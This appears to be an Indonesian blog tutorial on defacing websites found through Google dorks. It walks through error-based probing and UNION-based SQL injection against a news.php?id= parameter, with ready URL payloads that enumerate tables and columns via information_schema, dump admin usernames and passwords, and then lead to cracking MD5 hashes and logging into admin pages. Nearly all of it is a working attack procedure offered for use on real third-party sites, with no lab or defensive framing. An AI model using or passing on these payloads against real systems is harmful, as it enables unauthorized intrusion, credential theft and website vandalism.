1. Anda cari target web untuk di di deface menggunakan dork. Bisa anda cari disini
2. Ketikkan dork itu di kotak pencarian google, maka akan muncul banyak web di hasil pencarian. Silahkan anda buka salah satu
3. Tambahkan karakter ' pada akhir url'nya untuk mengetahui vulnerability'nya
Contoh : www.site.com/news.php?id=32'
4. Jika muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface
Contoh errornya : warning:
mysql_fetch_array(): supplied argument is not a valid MYSQL result
resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
5. Sekarang saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter +order+by+1-- di belakang url
Contoh : www.site.com/news.php?id=32+order+by+1--
Anda coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=32+order+by+2--
www.site.com/news.php?id=32+order+by+3--
www.site.com/news.php?id=32+order+by+4--
Saya memisalkan jumlah table web ada 4 (errornya di 4)
6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4--
Contoh : www.site.com/news.php?id=32+union+select+1,2,3,4--
Saya memisalkan angka 3 yang keluar
7. Sekarang masukkan version() pada angka 3 untuk memaparkan version
Contoh : www.site.com/news.php?id=32+union+select+1,2,version(),4--
8. Kita munculkan nama - nama table yang ada pada web tersebut dengan memasukkan perintah table_name pada angka 3 dan perintah +from+information_schema.tables-- dibelakang url
Contoh : www.site.com/news.php?id=32+union+select+1,2,table_name,4+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web
9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 3 dan perintah +where+table_schema=database()-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--
10. Selanjutnya kita keluarkan isi yang ada di table tersebut (column) dengan memasukkan perintah group_concat(column_name) pada angka 3 dan +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- di akhir url
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu text nama table'nya ke hexadecimal disini
Jadi misalkan nama table'nya tadi admin maka jika di convert akan menjadi 61646D696E
Contoh:
www.site.com/news.php?id=32+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--
Nanti akan muncul column yang berisikan username dan password
11. Lalu kita lihat isi dari column yang kita temukan. Saya misalkan
nama tablenya adalah admin, dan isi dari table admin adalah column
username & password. Maka masukkan perintah concat_ws(0x3a,"nama column yang ada di dalam table admin") pada angka 3 dan perintah +from+Admin-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,concat_ws(0x3a,"username,password"),4+from+Admin--
12. Maka kita akan melihat username dan password admin dari web tersebut. Saatnya kita eksekusi.
13. Cari admin pagenya, biasanya dengan menambahkan tulisan berikut di akhir url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat. Jika password
berbentuk MD5 seperti e10adc3949ba59abbe56e057f20f883e, anda crack dulu disini
Memang tidaklah semudah membalik telapak tangan, belajarlah sedikit sedikit.
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar